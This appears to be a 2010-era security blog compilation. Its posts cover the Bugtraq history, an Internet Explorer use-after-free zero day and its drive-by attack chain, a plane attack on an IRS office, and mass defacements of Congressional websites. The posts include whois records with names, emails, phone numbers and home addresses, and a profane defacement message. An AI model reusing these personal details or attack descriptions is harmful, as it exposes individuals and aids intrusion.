Bugtraq itself kicked off on November 5th, 1993, when Scott Chasin (Doc Holiday) started it as a response to perceived failure on the part of CERT to properly publish security warnings. Its founding policy was to publish vulnerabilities without regard to vendor response, an early salvo in the ongoing industry fight regarding full disclosure, or disclosing all known details of a security flaw.

The list was initially unmoderated but by the middle of 1995 was switched to moderated to cut down on the noise being generated. From 1996 to 2001 the list was moderated by Elias Levy (Aleph One), then turned over to David Ahmad, and finally rests in the hands as far as we know of David McKinney, a threat analyst at Symantec. The list was first hosted at Crimelab.com and moved to the NetSpace Project at Brown University when moderation began. In the summer of 1999, the list became part of SecurityFocus and thus in 2002 when SecurityFocus was acquired by Symantec it was part of that deal.

The philosophical underpinnings of full disclosure are complex, and long debated, but the major pro argument is that once security vulnerabilities are well known, the vendors responsible for the vulnerable code correct the problem faster. A secondary argument is that having the full details allows the security practitioner who is paying attention to react with some form of mitigation to a complex issue. The con argument is of course that releasing such information allows the vulnerability to be exploited by a larger audience of attackers.

Elias Levy (Aleph One) from Venezuela, well known as the author of the seminal article Smashing the Stack for Fun and Profit in Phrack, moderated the list from 1996 to 2001. In his words: “the environment at that time was such that vendors weren’t making any patches. So the focus was on how to fix software that companies weren’t fixing.” Some might question the pace of progress over the past ten years, we do have Patch Tuesday and all that entails, and the environment has shifted in a somewhat positive way, but the issue of timely patching of security problems is still a front burner concern in information security.

Interestingly, when Symantec acquired SecurityFocus, and with it BugTraq, there were accusations that Levy had ’sold out’ on the original principles of the list. Partially in response to this, the Full-Disclosure mail list was born.

Finally

SecurityFocus certainly lost whatever unbiased independence it had back in 2002, however that move (the Symantec buyout) also may have allowed it to keep going until now. The articles on the site were unusually complete (long for a security news site) making it possible to completely explain an idea, and some notably written by technically capable authors who could provide good commentary and insight into the issues they were presenting. The loss of this information, from a history of the security industry perspective, is unfortunate, because if there is an industry that does not always effectively carry forward and build upon lessons learned, it is this one.

Or as Santayana put it: “Those who do not learn from history are doomed to repeat it”.

Further there are not too many sources that have picked up the security news mantle effectively. Churnalism sites that offer a morsel of new information wrapped in an awkward product pitch presented as news aren’t going to cut it. Blogs, corporate ones, are heavily censored as their raison d’etre is marketing. And many independent blogs place value on brevity, a positive at times but not when it doesn’t allow an idea to be fully fleshed out.

So we’re left with the thought that someone, somewhere, needs to fire up the next SecurityFocus.

References

• Wikipedia: Bugtraq
• Mailing Lists – Security Focus

Related Posts:

• Asian Men Prefer LIGATT
• NationalCyberSecurity.com has all “Original Content”
• LIGATT’s Evans Strikes Back
• Did LIGATT Security’s CEO Threaten the Life of a Security Professional?

We posted an aside yesterday citing Microsoft’s recent blog post for new security advisory 981374 referencing a new zero day vulnerability in Internet Explorer versions 6 and 7. New details have emerged since, and the exploit has moved from being what was described as part of “limited targeted attacks” to being widely accessible and available as a new module for the Metasploit framework.

The major concern as always with vulnerabilities like this one is that the user needs only to visit a web site hosting the exploit to have their computer infected (there is no visible sign of a download or other user interaction required).

The vulnerability is a use after free vulnerability (memory is deallocated but then later accessed causing unexpected results such as a crash or arbitrary code execution) where an invalid reference is made to a freed pointer in the file iepeers.dll. This type of code error is fairly common, this is the second major instance of this type of error in Internet Explorer recently (with the well publicized ‘Google Aurora’ attack being associated with a similar type of code defect in the popular browser).

In terms of impact, together these two versions of IE account for approximately 20% of the browser market share. Microsoft has referenced protected mode, enabling Data Execution Prevention (DEP), and not running as a high privilege user (admin) as possible mitigating steps. While always a good idea, we’ve seen in the past methods that allow both DEP and protected mode to be bypassed. In terms of user privileges, its never a good idea to browse the Internet as a high privilege user, however user escalation vulnerabilities can be employed by the attacker once access is gained to the computer. The net of this is that the most effective mitigations available are to, if you are very concerned, temporarily use a different browser and that a patch be made available in a timely manner by Microsoft.

The Exploit

As provided by Trancer (Moshe Ben Abu) with modifications to the original that unobfusticate portions of code and remove the malware payload:

The Attack

The specific attack noticed on a web site (now down) called Topix21century.com occurs as follows:

• A user visits the web site, and a file called notes.exe or svohost.exe is downloaded and executed (drive by download).
• This executable creates two copies of itself in the /temp directory and drops a .dll file which is then injected into the process for Internet Explorer, providing back door remote access to the computer for the attacker.
• Once the attacker is in the system, he or she can perform actions as the user including attempting to escalate privileges, downloading files, etc..
• Activity was noted by McAfee where the infected system attempts to create an SSL connection to communicate with the domain: notes.topix21century.com.

Topix21century.com

The only references to this topix21century.com site we noted are links in Japanese language forums referencing pictures of women in the Japanese Self-Defense Force.

The site is hosted on ISP GoDaddy, a geolocation lookup on the IP (68.178.232.100) shows a location of Scottsdale, Arizona.

The whois for the site hosting the exploit is as follows:

Registrant:
   jack lee
   13block
   LA, California 55462
   United States

   Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
   Domain Name: TOPIX21CENTURY.COM
      Created on: 06-Mar-10
      Expires on: 06-Mar-11
      Last Updated on: 06-Mar-10

   Administrative Contact:
      lee, jack  robertwanger@aol.com
      13block
      LA, California 55462
      United States
      (818) 581-6872      Fax -- 

   Technical Contact:
      lee, jack  robertwanger@aol.com
      13block
      LA, California 55462
      United States
      (818) 581-6872      Fax -- 

   Domain servers in listed order:
      NS17.DOMAINCONTROL.COM
      NS18.DOMAINCONTROL.COM

A similar registrar entry is listed for the domain hotgreenlight.com, currently a parked domain:

Registrant:
   thomason lee
   12block
   LA, California 95512
   United States

   Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
   Domain Name: HOTGREENLIGHT.COM
      Created on: 18-Dec-09
      Expires on: 18-Dec-10
      Last Updated on: 18-Dec-09

   Administrative Contact:
      lee, thomason  robert.wanger@hotmail.com
      12block
      LA, California 95512
      United States
      (626) 395-6544      Fax -- 

   Technical Contact:
      lee, thomason  robert.wanger@hotmail.com
      12block
      LA, California 95512
      United States
      (626) 395-6544      Fax -- 

   Domain servers in listed order:
      NS61.DOMAINCONTROL.COM
      NS62.DOMAINCONTROL.COM

McAfee and Blame? (Update 03/11)

For some silly reason, McAfee Labs is eating some blame over being transparent and informative in their Avert Labs post on Tuesday. When Israeli security researcher Moshe Ben Abu (who is a legitimate security researcher not some shadowy underworld black hat) noticed the post had a URL reference to Topix21century.com, he went and had a look at the site, analyzed how the exploit worked, and made a contribution to the Metasploit project detailing how the exploit functions.

Or put another way, he analyzed an existing exploit being used by attackers and took the time to explain it. He didn’t invent it, use it to compromise computers, or any other related black hat activity. Some will argue that he amplified its effect, something that would require an entire blog post to dispute, so we won’t get into it here.

Ryan Naraine highlights this flow, but passes no judgment on it in an article on ZD Net. Unfortunately fellow CNET journalist Elinor Mills takes it a step further, suggesting by inference (by asking McAfee to “respond”) that the anti-virus company has some culpability here, to which McAfee responded:

“McAfee Labs does not support the release of exploit code, particularly in advance of a security patch being made available. We regularly sanitize blog content to prevent providing information that might assist attackers, while at the same time providing a service to customers and the security community to help improve protection levels,” the spokesman said in a statement via e-mail. “The post in question did not contain enough information to directly lead anyone to exploit code. However, we regret that in this unique situation the post did contain details that may have given exploit writers a starting point to hunt for exploit code. Future blog posts will be subject to additional sanitization.”

Such “sanitization”, a great Orwellian word, means that blog posts will be slower to publish (going through further ‘review’ cycles) and contain a less complete picture of what has happened. Interestingly, since McAfee does not have the Amazing Kreskin working for them, they get information like everyone else, by having customers or related parties share it with them (presumably in un-sanitized form).

For anyone who hangs around in black/gray hat discussion forums, you don’t see Plato’s dialogues going on in there, but you do note that the yin side of the information security paradigm is pretty good at disseminating vulnerability information post discovery.

Worse yet, the response is contradictory, stating on one hand that the information in the post was appropriate and did not assist “attackers” (Abu is still not an attacker, so assuming they mean groups working off the Metasploit module), but then reverses itself and says they regret the post and will ’sanitize’ more in the future.

The problem is that the analysis of the exploit had a lot more to do with the analytical talent of Abu and not a whole lot to do with the somewhat refreshing transparency that has marked McAfee’s blogs since the Google Aurora incident. Unfortunately, looking at the response above, this period of valuable content may be at this corporate censored end.

Further, as Abu himself points out, he would have found the exploit code anyway regardless of any McAfee post.

Finally

The timing of this could be better for Microsoft, in that this closely follows the Aurora incident with Google that played out so publicly, and the defect is a nearly identical type of problem. That said, the saving grace for Microsoft in the retail market is that the IE 8 code is stated to not be affected, and Redmond would prefer you upgrade to the latest and greatest anyway.

The anti-virus vendors largely have the original payload on this one figured out, but unfortunately the payload can be changed as the infection vector is the thing to worry about. For that to be corrected, Microsoft will have to issue a patch. You do have the option of temporarily using another browser, or alternatively upgrading to IE version 8, which is currently reported to not be affected.

This advice is reasonable for the home user, however upgrading the browser on a large corporate network is no small thing. For that reason we advise waiting for the patch, and applying it within a shortened cycle, as in terms of vulnerabilities, remote browser exploits that require no user interaction are somewhat critical problems. As always, users should avoid links to sites they’re not familiar with, but in practice this is very difficult as almost everyone is susceptible to some form of an effective social engineering trick (a targeted phishing e-mail or IM seemingly from a friend and so forth).

Regarding the tempest in a teapot around the the McAfee Avert Labs blog post by Craig Schmugar and the responses of a tired drumbeat of worn out points around responsible disclosure, its time for some in the security industry to grow up a little bit. Transparency and the near free flow of shared information are the only way the defensive side of information security can hope to catch up to the attackers.

References

• CVE-2010-0806
• OSVDB 62810
• MSFT Security Advisory 981374
• Targeted Internet Explorer Zero-Day – McAfee Labs
• Microsoft Internet Explorer iepeers.dll use-after-free exploit

Related Posts:

• Press F1 for Help, pwned.
• The “Aurora” IE Exploit Used Against Google in Action
• Windows 7 SMB Kernel Crash Video
• Juniper Kernel Crash – scapy Code
• JUNOS (Juniper) Kernel Crash Video

Noted journalist and friend of the blog George V. Hulme shared the picture below from a CNBC broadcast, perhaps the most amusing way seen thus far of describing the patch for the ‘Aurora bug‘ that famously affected Google late last year.

That assumes of course that Microsoft is not in fact working on a Google Attack Patch.

The Google Attack Patch is coming soon.

Of course they are referring to Microsoft’s out of band patch release on January 21st for the Internet Explorer use after free vulnerability that has been nicknamed Aurora.

Aurora Patch description.

Praetorian advises giving this patch special attention in your environment, especially if you continue to run on Internet Explorer 6.0. The vulnerability is not confined to this version of the browser, but the method of attack is well known for this version at this point.

Related Posts:

• Turning an ATM into a Slot Machine
• Press F1 for Help, pwned.
• Adobe util.printd Zero Day
• Six Bulletins in Last Patch Tuesday of 2009
• The Barack Obama Donations Site was Hacked…err, no it wasn’t.

The much maligned password has existed for thousands of years, for example the Greek historian Polybius described their use in the Roman military before the birth of Christ.

To illustrate the point here is a clip, the password scene, from the 1932 Marx Brothers movie “Horse Feathers”.

At first he thought the password was ‘password’, putting him right in line with what is typically quoted as the second most frequently used password in computer systems.

Swordfish doesn’t appear in the top 500 worst passwords. Also a plus, they change the password often.

Remember, the password is ‘Swordfish’.

Related Posts:

• Google’s New Year’s Eve Tricks
• Halloween Jokes, Twitter & Google

In what could be the first act of domestic terrorism since Timothy McVeigh, a small plane (Piper) that set out from Georgetown Municipal Airport hit a federal office building housing the Internal Revenue Service (IRS) at 11:36 AM in Austin, Texas. A software developer, Joseph Andrew Stack, who had previously set his house on fire, was the pilot who suicidally flew his plane Kamikaze style into the building in an apparent act of revenge against the IRS as detailed in a 3,202 word suicide note on his web site: http://embeddedart.com. The web site is reporting a last update of Thursday, February 18, 2010 10:12:53 AM.

Note that the following message now appears on embeddedart.com: This website has been taken offline due to the sensitive nature of the events that transpired in Texas this morning and in compliance with a request from the FBI. If you want to see the original letter, please see the archived version at thesmokinggun.com. Regards, T35 Hosting http://www.t35.com/

The suicide note on embeddedart.com downloaded as a pdf: Well Mr. Big Brother IRS man… take my pound of flesh and sleep well.

The suicide note as it originally appeared.

The FBI and CIA also have offices in the same building complex. This particular IRS office is home to a group called the EP Team Audit Program, which examines employee benefit plans with 2,500 or more participants.

Terrorism?

The Echelon Building Burning.

Well certainly not the kind that one would think of with regards to foreign religious ideological based groups, such as Al Qaeda, but let’s take a closer look at what the definition of terrorism really is:

(the calculated use of violence (or the threat of violence) against civilians in order to attain goals that are political or religious or ideological in nature; this is done through intimidation or coercion or instilling fear) -Princeton.edu

Well, one could make argument that this was a decision to commit suicide in a very public way (crashing planes into buildings is certainly an attention getter), to further his views as outlined in the manifesto he wrote, or that this was an attempt to incite some sort of movement by his actions. Regardless, there was an attempt to incite fear. The deliberate use of an airplane as the method of attack, along with the parallels it invokes, are no accident. These characteristics place this as, albeit minor given the no reported deaths, an act of domestic terrorism.

“I am finally ready to stop this insanity. Well, Mr. Big Brother IRS man, let’s try something different; take my pound of flesh and sleep well.”
- Joseph Stack

Is the Letter a Hoax?

We do not think so. Let’s explore this a little, first looking at the whois results for this http://embeddedart.com/ web site. The person listed as the administrative contact is the same person being identified as the pilot, Joseph Stack. Further the web site was not registered recently, its been around for seven years. Finally, while we’ve been impressed with the complexity of Internet hoaxes in the past, its not easy to write a well thought out essay of 3,202 words in less than two hours.

Administrative Contact:
Stack, Joe dns.5.sgmail@dfgh.net
925 E Hwy 80
287
San Marcos, TX 78666
US
1.3215649879
Technical Contact:
Stack, Joe dns.5.sgmail@dfgh.net
925 E Hwy 80
287 San Marcos, TX 78666
US
1.3215649879

Registrar of Record: TUCOWS, INC.
Record last updated on 16-Sep-2006.
Record expires on 05-Jun-2010.
Record created on 05-Jun-2003.

So this does appear to be as it outwardly appears: the last essay of an American suicide bomber with a serious beef against the IRS.

A Software Engineer

Looking at the previous form of Stack’s web site, before it hosted an anti-tax manifesto, it advertised his software contracting services:

Joseph Stack Web Site

Company Mission

To advance the art of programming, one project at a time; by achieving an optimum balance between
 cost, schedule, functionality, reliability, and maintainability. 

Resume

Stack’s software experience (resume): Embedded Art – Key Environment Components.

Software Projects

Listed customer projects from Joseph Stack's web site.

Stack’s Home Location

According to his web site, his address appears to be a condominium unit:

6001 W. Parmer Ln., #370-167
Austin, TX 78727

Condo address listed on Stack's web site.

However this may be old, as another web site is reporting the address to be: 1827 Dapplegray Lane. This makes more sense when combined with the house burning video below (there is a fence/wall in both).

The address listed as Stack's on media web sites.

If this is really his house, its a nice place for a guy with tax problems:

House listed on media outlets as Joseph Stack's.

Either way, this was what the house looked like this morning:

A Wrong Reaction

So other than being a homeland security issue, why would a humble information security blog find this interesting? Well it is always interesting to us how people handle incident response.

The DHS Journal reported the following via Twitter: “Small plane crash into private office bldg in Austin, TX. Cause unknown, but no known link to terrorism.”

White House spokesman Robert Gibbs also weighed in, saying it was not an attack.

Related Posts:

• DHS Responds to Us

Shortly after President Obama’s State of the Union address, constituents visiting the web sites of Congressional representatives like Charles Gonzalez (20th District of Texas), Spencer Bachus (Alabama’s 8th District), and Brian Baird (Washington’s 3rd District) were presented with a defacement message from the Red Eye Crew that as of 4:10 am EST remains up on their web sites. All of the sites affected are in the house.gov domain, but not every congressional site in the domain is defaced.

The Defacement

The sites were defaced to simply show the following line of text:

FUCK OBAMA!! Red Eye CREW !!!!! O RESTO E HACKER !!! by m4V3RiCk ; HADES ; T4ph0d4 -- FROM BRASIL

Official web site for Representative John Barrow (D - GA).

O RESTO E HACKER is Portuguese, roughly “The rest are hackers”.

Affected Sites

Here is a list of Congressional members web sites that we noted were affected last night. The full list, 49 web sites, attached below as Appendix A, was released on the 28th.

http://www.joewilson.house.gov/

http://bachus.house.gov/


http://www.baird.house.gov/


http://www.barrow.house.gov/


http://www.gonzalez.house.gov/


http://mcnerney.house.gov/


http://mikepence.house.gov/


http://driehaus.house.gov/


http://carson.house.gov/


http://campbell.house.gov/


http://doggett.house.gov/


http://coffman.house.gov/


http://www.kosmas.house.gov/


http://hersethsandlin.house.gov/


http://lujan.house.gov/


http://www.mccollum.house.gov/


http://teague.house.gov/


http://mitchell.house.gov/


http://www.roe.house.gov/


http://www.lofgren.house.gov/


http://carnahan.house.gov/


http://www.chrismurphy.house.gov/


http://hunter.house.gov/


http://olver.house.gov/


http://arcuri.house.gov/


http://olver.house.gov/


http://tierney.house.gov/

A few committee sites were affected as well:

http://republicans.financialservices.house.gov/

http://republicans.oversight.house.gov/


http://gop.cha.house.gov/

Defaced Sites Normal Appearance

Here are a few examples of what the now defaced sites normally look like:

The Spencer Bachus site on better days.

The Charles Gonzalez site on better days.

The RedEye Crew

The Red Eye Crew has been around for a while, and have thousands of web site defacements to their credit. One member, handle HADES, defaced 453 government sites in Brazil last August through a reported SQL Injection. A quick review of the defacements captured at Zone-H shows 45,735 defacements, primarily mass defacements. At one point they were doing tongue in cheek dedications to the memory of Elizabeth Bathory, a prolific female serial killer from the Middle Ages.

Last August, they defaced the web site of Old Dominion University with a message in Portugese, supporting their being a Brazilian team. The team has also defaced a number of Brazilian web sites. These two points are alongside the fact that they come right out and say that they’re from Brazil.

Not the First Time Around

“those were default passwords, meant to be changed by the Representatives’ offices.”
GovTrends

As one of our readers astutely pointed out, these sites are managed by a third party provider called GovTrends a Virginia web development company with the somewhat ironic phrase “You get what you pay for” on their web site. Last August at least 18 congressional member sites managed by the same vendor were defaced by Indonesian cracker 3n_byt3 (1164 defacements to his credit), a result of a reported login to the administrative portion of the sites with a default password according to GovTrends, in an apparent attempt to deflect blame for the attack back to House staffers.

This explanation actually makes little sense, because the defacer added a news item to each page stating: H4ck3d by 3n_byt3 @ Indonesia H4ck3rs. If he had full administrative access to the CMS platform, the defacement would have been a full page defacement, not an injection into a news item on the site. The problem was much more likely an SQL injection, potentially the Joomla Component News SQL Injection vulnerability.

Senator Edwards site defacement from last August.

And Then It Got Awkward

“It is extremely important that my constituents can trust that information provided to my office is kept confidential and secure.”
Rep. Spencer Bachus

After the attack in August Representative Spencer Bachus sent a letter to the CAO (Chief Administrative Officer) of the House, asking essentially for two things: actual details of the attack and a plan for notification of these incidents in the future, as shared with Brian Krebs.

You can read the full letter here: BachusLetter.

In the letter he states “GovTrends refused to provide copies of the logs of the intrusion” and referred all questions to the HIR (House Information Resources), while at the same time telling the press the default password theory. Its completely unclear why Representative Bachus, who appeared to be the only one publicly calling for a review of the logs by someone with forensics expertise, was denied being able to do this.

The risk of a breach and defacement is born fully by him, as the web site is in his name, and thus the request for a proper investigation by a computer forensics expert the correct instinct in this scenario. By not conducting a proper review of the attack in August, and conducting a web application vulnerability assessment following that, there was little hope of preventing future defacements such as the one today.

So How did they get in?

“Over the last year the House has continued aggressively fortifying its security systems.”
Jeff Ventura, CAO spokesman, August 7th, 2009

Unfortunately, we won’t know that until someone who manages house.gov provides some details. Server access seems unlikely, because while the sites we checked are hosted on dcserver1.house.gov, not every site hosted on that server is defaced (example congressman Joe Sestak’s web site was fine). The sites are not redirecting anywhere.

Congress members seem to be able to use different content management systems for updating their web sites. For example, Michelle Bachmann’s site uses a tool called Fireside, a content management system targeted towards members of Congress. That site returns firesideweb.house.gov as the server, whereas the defaced sites we checked return dcserver1.house.gov. All of the defaced sites we saw have one commonality, and that is that they are run on the Joomla content management system.

But not all of the Joomla CMS web sites are affected. For example a comment tag indicates that sites http://ellison.house.gov and http://kirkpatrick.house.gov are using Joomla, but they were not defaced. This might indicate that it is a Joomla component that is to blame, however that is just speculation.

Joomla has had its share of security vulnerabilities in the past (as shown in the OSVDB). Don’t waste time discussing historical vulnerabilities in Joomla or its extensions however, like all popular complex web content platforms configuration by the web site operators is important and it is their responsibility to ensure a patched installation with a secure configuration (like no default passwords). Only when an installation is fully updated and a zero day or improperly reported vulnerability is introduced based on a careless mistake, can the platform come into serious question.

Regardless, only the person who has access to the server the sites are running on and performs the forensic analysis will be able to tell exactly what happened. Hopefully they will release some sort of statement.

Updates – 1/28/09

Representatives John Boehner and Nancy Pelosi want to know what happened, as detailed in a letter sent to the House CAO today:

January 28, 2010

The Honorable Daniel P. Beard
Chief Administrative Officer
U.S. House of Representatives
Washington, DC 20515

Dear Mr. Beard:

We request that you initiate an immediate and comprehensive assessment of how hackers were able to 
deface the websites of nearly fifty House Members and Committees last night.

In the past, we jointly requested that your office review and tighten cybersecurity protections designed 
to ensure that congressional offices and committees are safeguarded from unauthorized intrusions. We 
appreciate the efforts you and your cybersecurity team have taken to tighten firewalls, as well as more 
recent efforts to ensure that official mobile communications devices are secure from hacking and other 
intrusions.

However, last night's actions indicate that further review of security procedures are needed. From initial 
reports, these intrusions appear to be related to one website vendor which has had previous security 
failures. While many Members have expressed satisfaction with the vendor in question, this is the second 
time in a year websites hosted and supported by this vendor have been compromised. We therefore request 
that your office work with the Committee on House Administration to review the security standards for House 
vendors and to assess whether this vendor, and others, have adhered to those standards. We also request 
that you take immediate action to protect against breaches of the House firewalls and to ensure website 
security of all House offices.

Thank you for your attention to this matter.

Sincerely,


NANCY PELOSI                      JOHN BOEHNER
Speaker                               Republican Leader

Cc: The Honorable Robert A. Brady
Chairman, Committee on House Administration

The Honorable Dan Lungren
Ranking Member, Committee on House Administration

SOURCE Office of the Speaker of the House

Some outlets are reporting that this was “an attack on the site’s of Democrats”. Note that one of the first sites we saw was defaced was that of Republican Congressman Joe Wilson from South Carolina. “You lie!”-nope, its true.

SC Magazine got a reaction from Jeff Ventura, spokesman for the Office of the Chief Administrative Officer (CAO) in the U.S. House: “None of the sites we host and manage internally at the House are impacted, it was through no action of ours that this breach occurred.”.

The server appears to be the same as many of the other representative’s sites, so a full abdication of responsibility to the vendor, especially at this early stage without a statement from a qualified computer forensics resource, would seem to be inappropriate. Further the question for the CAO as well as the affected members of Congress is why they stuck with the same vendor after the August breach and the subsequent refusal to provide a detailed analysis or logs that could be reviewed by a computer security expert. Finally the organization with the overall responsibility for information technology must regularly vet vendors they use.

Then the associated press reported this:

Ventura says the vendor was performing an update and for a brief moment let its guard down. That was long enough to allow the hacker to penetrate the sites.

Without further information this makes little sense. It is a classic response to elevate the cracker by saying that they caught you in a moment of ‘letting your guard down’, further the “we were upgrading systems” response is always thought better than the “a vulnerability was out there for x amount of time” response. What maintenance allowed a cracker to get in and how did they happen to get to you in that short window? It does happen sometimes, but its unusual and usually still based on an IT error, even in sites that are under constant external probing by bad actors.

Further evidence would have to be provided for this to be an acceptably plausible theory of what happened, especially in light of the scant details and somewhat problematic explanation of the August attack.

Ventura stated to Politico:

“I think what you’re going to see going forward is an insistence to the adherence of policy, as opposed to just the suggestion that the policy standard has to be a certain level.”

This is actually somewhat similar to what was stated the last time around. If I’m a member of Congress whose reputation is being affected, at this point I’m calling for a computer forensics team from a reputable company to come in for an evaluation and tell me a reasonable theory of how this breach happened. Then I’m releasing a statement, identifying the expert firm I called in to do the evaluation, so that people understand that a serious investigation took place. Further I’m getting a web vulnerability assessment done on the house.gov web properties. These two actions don’t offer any guarantee of perfect forward security, but they make a big difference.

At the same time Govtrends is being painted as stonewalling: “GovTrends employees did not return multiple phone or email messages seeking comment.” And Ventura states “We’re discussing our options,”.

RedEye also defaced three Brazilian government web sites last night (addresses below) with the following message:

Red Eye Crew! Owned by HADES && m4V3R1ck

www.cedasc.ba.gov.br 
www.cti.gov.br 
itapiranga.cti.gov.br 

Finally in a piece of completely unrelated but somewhat coincidental circumstance, Joomla.org, the project homepage of the Joomla CMS used by the Congressional sites, was itself defaced by the same Red Eye Crew back in August of 2008.

H A C K E D !

joomla.org owned!


Red Eye CREW

owned joomla.org =)

m4V3RiCk - W4n73d - _dDoS_

by m4v3rick

"That´s all Folks!!"

Appendix A – Full list of Affected Sites

altmire.house.gov
arcuri.house.gov
bachus.house.gov
baird.house.gov
barrow.house.gov
bilirakis.house.gov
boccieri.house.gov
bright.house.gov
campbell.house.gov
carnahan.house.gov
carson.house.gov
charliewilson.house.gov
childers.house.gov
coffman.house.gov
dahlkemper.house.gov
davis.house.gov
doggett.house.gov
driehaus.house.gov
energycommerce.house.gov
gonzalez.house.gov
gop.cha.house.gov
hersethsandlin.house.gov
honda.house.gov
hunter.house.gov
joewilson.house.gov
kirk.house.gov
kosmas.house.gov
larson.house.gov
lipinski.house.gov
lofgren.house.gov
lujan.house.gov
mccollum.house.gov
mcnerney.house.gov
mikepence.house.gov
mitchell.house.gov
mollohan.house.gov
murphy.house.gov
murtha.house.gov
olver.house.gov
quigley.house.gov
republicans.financialservices.house.gov
republicans.oversight.house.gov
resourcescommittee.house.gov
roe.house.gov
schakowsky.house.gov
shea-porter.house.gov
teague.house.gov
tierney.house.gov
welch.house.gov 

Related Posts:

• Newsweek Reports Zombie Invasion
• Going After BP
• Umm…TechCrunch? Defacement Two in 24 Hours
• TechCrunched – TechCrunch the Victim of a Defacement
• Baidu.com the Latest Victim of Iranian CyberArmy